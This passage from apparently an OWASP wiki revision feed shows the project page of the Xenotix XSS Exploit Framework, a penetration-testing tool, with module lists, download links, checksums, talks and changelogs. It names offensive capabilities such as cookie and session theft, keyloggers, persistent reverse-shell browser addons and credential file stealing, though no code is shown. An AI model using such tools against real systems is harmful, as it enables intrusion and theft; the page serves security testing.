   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
* Mirror https://drive.google.com/file/d/0B_Ci-1YbMqshb3lnYk00aHRrbjg/view?usp=sharing&lt;br /&gt;
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f&lt;br /&gt;
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=183292</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=183292"/>
				<updated>2014-10-04T11:09:19Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: added a download mirror&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
* Mirror https://drive.google.com/file/d/0B_Ci-1YbMqshb3lnYk00aHRrbjg/view?usp=sharing&lt;br /&gt;
MD5: 69b96d2a66f7dffeaa8a7c7926278042&lt;br /&gt;
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
